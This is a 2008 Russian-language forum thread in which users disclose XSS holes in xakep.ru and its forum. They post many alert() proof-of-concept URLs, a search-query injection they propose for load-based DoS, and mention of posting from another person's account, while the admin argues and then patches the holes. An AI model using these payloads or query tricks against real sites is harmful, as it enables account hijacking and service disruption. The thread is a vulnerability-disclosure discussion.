[ Обзор уязвимостей xakep.ru ]
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[ Обзор уязвимостей xakep.ru ] - 2008-08-07 10:31:07.073333
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
Пу, йа вообше не понимаю, за что тебе ЗП платят ..
____________________________________________________________________
http://forum.xakep.ru/pm.aspx?p=2x"><script>alert("BlackSun")</script><noscript>
------
http://forum.xakep.ru/searchpro.aspx?phrase=%D0%B2%D0%B2%D0%B5%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5+%D0%B2&author=&forumid=ALL&topicreply=both&message=body&timeframe=%3E&timefilter=0&language=single&top=300&criteria=AND&minRank=0&sortMethod=r&%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%3Cscript%3Ealert('mo4x')%3C/script%3E%3C!------submitbutton=+ik+
------
http://forum.xakep.ru/memberlist.aspx?gid=-100&searchterm=%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%3Cscript%3Ealert%28%27mo4x%27%29%3C%2Fscript%3E%3C%21------&fnamesearchOp=1&fnamesearch=&fnamesearchbool=1&lnamesearchOp=1&lnamesearch=&lnamesearchbool=1&hpsearchOp=1&hpsearch=&hpsearchbool=1&fromsearchOp=1&fromsearch=&fromsearchbool=1&fld_1searchOp=1&fld_1search=&fld_1searchBool%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%3Cscript%3Ealert('mo4x')%3C/script%3E%3C!------=1&customregfield=1
------
xakep.ru
http://www.xakep.ru/articles/gmail/registr.asp
УязвимополеВашлогин:
"><script>alert("BlackSun");</script>
------
http://forum.xakep.ru/searchpro.aspx?p["><script>alert("BlackSun")</script><noscript>]=2&searchfor=active
-----
http://forum.xakep.ru/pmsearch.aspx?folders=%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%22%3E%3Cscript%3Ealert('mo4x')%3C/script%3E%3C!------
----
вначале на http://forum.xakep.ru/showprofile.aspx?memid=44318&lastPostViewType["><script>alert("BlackSun")</script><noscript>]=1
либо сюда
http://forum.xakep.ru/calendar.aspx?calendarID=b&caldate["><script>alert("BlackSun")</script><noscript>]=2008-08-06&types=viewday
- "><script>alert("BlackSun")</script><noscript> - запишется в куки, потом
http://forum.xakep.ru/pmsend.aspx?toMemId=44318 - ксс
----
http://forum.xakep.ru/searchpro.aspx?p=2&author=BlackSun&forumid["><script>alert("BlackSun")</script><noscript>]=
----
http://www.xakep.ru/articles/soft/coding.asp?page["><script>alert("BlackSun")</script><noscript>]=2
-----
http://forum.xakep.ru/pmsend.aspx?do=replyall&PMID=1&toMem=dddwww%2</textarea><script>alert("BlackSun")</script>
-----
http://www.xakep.ru/post/44551/default.asp?page=2--><sсriрt>alert("oRb");</sсriрt>
____________________________________________________________________
// BlackSun [S.T.A.R.S. Team]
// ЗЫ: пишу с чужого акка
// ЗЫ2: куки у саймона не йа увел
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 10:34:54.730000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Реально не понимаю :)
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 10:41:56.123333
|
|
|
Bios Nielsеn
Сообщений: 6266
Оценки: 321
Присоединился: 2007-10-22 19:45:18.176666
|
это ксски
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 10:44:06.310000
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
мдя уж…. потыкал наобум…. реально канают ссыли…. вот это попец какой…. "Много водка кольбаса" - почесаться бы ужо следовало….
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:00:20.500000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
дыр больше, это только часть.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:14:17.530000
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
Дополнение:
http://www.xakep.ru/articles/soft/coding.asp?page["><script>alert("BlackSun")</script><noscript>]=2
есстесно и подобные (/articles/hard/ и тд)
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:22:35.123333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Не буду стоять в сторонке:
http://www.xakep.ru/post/44551/default.asp?page=2–%3E%3Cscript%3Ealert(%22oRb%22);%3C/script%3E
Надо же и свое самолюбие потешить.
Может в сентябрьском номере скопипастят лог с форума. За материалами далеко ходить не надо.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:36:52.873333
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
Веселье продолжается:
http://forum.xakep.ru/pmsend.aspx?do=replyall&PMID=1&toMem=dddwww%2</textarea><script>alert("BlackSun")</script>
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:42:48.983333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Особый атракцион, называеться скула орба. Вход для 18+
http://www.xakep.ru/articles/common/result.asp?tosearch=title+like+'*'+#%0A
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:45:30.186666
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
quote:
Надо же и свое самолюбие потешить. Может в сентябрьском номере скопипастят лог с форума. За материалами далеко ходить не надо
Самокритика в журнале?… хм интересно почитать и оценить объективность их воспиятия данной ситуёвины….
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:51:22.860000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
ORIGINAL: Mkey
quote:
Надо же и свое самолюбие потешить. Может в сентябрьском номере скопипастят лог с форума. За материалами далеко ходить не надо
Самокритика в журнале?… хм интересно почитать и оценить объективность их воспиятия данной ситуёвины….
Да если почитать журнал, то не складываеться впечатление, что авторов интересует ][ как интернет-проект. Один Пу как-то двигает сайт.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 11:58:04.310000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
/me зевает
У меня вообще ничего из присланного не работает
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:02:23.110000
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
Пу, те реально похуй на форум чтоли?
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:02:50.780000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
ORIGINAL: Pupkin-Zade
/me зевает
У меня вообще ничего из присланного не работает
good joke
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:04:11.546666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Дайте хоть одну точную ссылку которая хотя бы alert выведет
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:05:24.373333
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
quote:
ORIGINAL: Pupkin-Zade
Дайте хоть одну точную ссылку которая хотя бы alert выведет
Все в первом посте
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:06:06.670000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Да емае! Пу, кто ставил защиту на переименование букв c и p на русские
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:06:17.873333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
НИ ОДНА НЕ РАБОТАЕТ
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:06:41.826666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Она стояла давным давно
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:07:35.843333
|
|
|
xaxa89
Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000
|
У меня тоже ниодин алерт не вывело!!!
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:08:27.733333
|
|
|
dddwww
Сообщений: 38
Оценки: 0
Присоединился: 2006-11-24 18:26:45.746666
|
quote:
ORIGINAL: Pupkin-Zade
НИ ОДНА НЕ РАБОТАЕТ
Без проблем, йа хотел помочь .. закрой топ и мну забань.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:09:11.843333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Те скрины дать? или все же перестанешь лениться и руками в адресной строке все пропишешь ?
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:10:14.903333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Че за сопли
За помощь спасибо
Понять не могу в чем она - в ссылках трехмесячной давности
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:10:19.826666
|
|
|
Persona non grata
Сообщений: 1164
Оценки: 0
Присоединился: 2008-03-25 00:29:28.436666
|
Дайте наконец скрины!
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:10:51.263333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
quote:
ORIGINAL: oRb
Те скрины дать? или все же перестанешь лениться и руками в адресной строке все пропишешь ?
Ты дурак что ли? ЧТО НАДО КУДА ПРОПИСАТЬ?
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:16:40.030000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Любуемся.
http://s55.radikal.ru/i149/0808/82/d8b766939cca.jpg
quote:
ORIGINAL: Pupkin-Zade
quote:
ORIGINAL: oRb
Те скрины дать? или все же перестанешь лениться и руками в адресной строке все пропишешь ?
Ты дурак что ли? ЧТО НАДО КУДА ПРОПИСАТЬ?
=/
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:31:11.826666
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
quote:
ORIGINAL: Pupkin-Zade
НИ ОДНА НЕ РАБОТАЕТ
конечно не работает.. и по совокупности после этого ластвизит перестал работать…. а минут 40 назад все канало…. я не большой спец в веб, но по косвенным признакам… он тупо обрубил обработку каких нить скриптов глобально…… а попытки ПЗ сделать хорошую мину при плохой игре не делают ему чести…
факт багов подтверждаю….. знал бы что будут отнекиваться - сделал оперативно скрины…. блин аж противно стало….
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:35:26.343333
|
|
|
Persona non grata
Сообщений: 1164
Оценки: 0
Присоединился: 2008-03-25 00:29:28.436666
|
quote:
ORIGINAL: Mkey
quote:
ORIGINAL: Pupkin-Zade
НИ ОДНА НЕ РАБОТАЕТ
quote:
http://forum.xakep.ru/pm.aspx?p=2x"><sсriрt>alert("BlackSun")</sсriрt><nosсriрt>
конечно не работает.. и по совокупности после этого ластвизит перестал работать…. а минут 40 назад все канало…. я не большой спец в веб, но по косвенным признакам… он тупо обрубил обработку каких нить скриптов глобально…… а попытки ПЗ сделать хорошую мину при плохой игре не делают ему чести…
факт багов подтверждаю….. знал бы что будут отнекиваться - сделал оперативно скрины…. блин аж противно стало….
+1, подтверждаю написанное, ластвизит перестал работать.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:36:07.013333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Чего мне отнекиваться то? Полез править и проверять - не работает… И мину мне на надо никакую делать.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:39:29.250000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Починил
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:48:59.013333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
http://www.xakep.ru/articles/common/result.asp?tosearch=title+like+'*'–%0A
А это часть функционала сайта?
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 12:49:00.310000
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
quote:
ORIGINAL: Pupkin-Zade
Чего мне отнекиваться то? Полез править и проверять - не работает… И мину мне на надо никакую делать.
ну тогда вопрос в лоб… как админу данного форума…..
почему 40 минут назад они работали…. у многих… и ластвизит тоже…..
а потом перестали… и админ к этому руку не прилогал…. что это за темные силы электричества такие?
——————-
quote:
Починил
ааа тогда вопрос снят
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 13:09:46.293333
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
опять last visit не робит :)
Пу, бери бубен и начинай шаманские пляски :)
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 13:11:54.076666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
quote:
ORIGINAL: Mkey
ну тогда вопрос в лоб… как админу данного форума…..
почему 40 минут назад они работали…. у многих… и ластвизит тоже…..
а потом перестали… и админ к этому руку не прилогал…. что это за темные силы электричества такие?
Потому что когда говорят, что там дырка, то лезешь и блочишь все, что можно, несмотря на то, что у тебя не работает
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 13:13:48.076666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
согласен, вытащить из нее врядли, что получиться. Но что помешает, человеку использовать этот функционал для доса? Накрутить там много логики, и сервак будет лопатить по долгу.
http://www.xakep.ru/articles/common/result.asp?tosearch=title+like+'*'+OR+title+like+'*a*'+OR+title+like+'*x*'+OR+theme+like+'*k*'
Это запрос, обрабатывался 9-10 секунд. Я один. А если DDOS? (а вдруг девченки? (с)стиморол)
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 15:56:24.170000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Наткнулся я тут: http://www.xakep.ru/articles/links/
Там валялось: http://www.xakep.ru/local/redirect.asp?url=articles%2FLinks%2Fresult%2Easp%3Ftosearch%3Dtheme+like+%27%2AzLINKSz%2A%27+and+theme+like+%27%2AzOSz%2A%27and+NOT+theme+like+%27%2AINFO%2A%27
ну а дальше пробовал в других разделах.
зы: Замени морду форума на html'ку, как раньше ты делал. А то тормоза невозможные.
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 16:22:34.296666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Щас уже вроде нормально
|
|
|
|
|
RE: [ Обзор уязвимостей xakep.ru ] - 2008-08-07 16:47:18.093333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Вот еще одна, правда для корректной работы windows.opener нужен.
http://forum.xakep.ru/upload.aspx?mode=sig&memori=54426&deletefile=8E434292F8B64B0D9EC86BED1DB19821.gif%22%3E%3Cscript%3Ealert("oRb");%3C/script%3E%3C!–
|
|
|
|
|
|
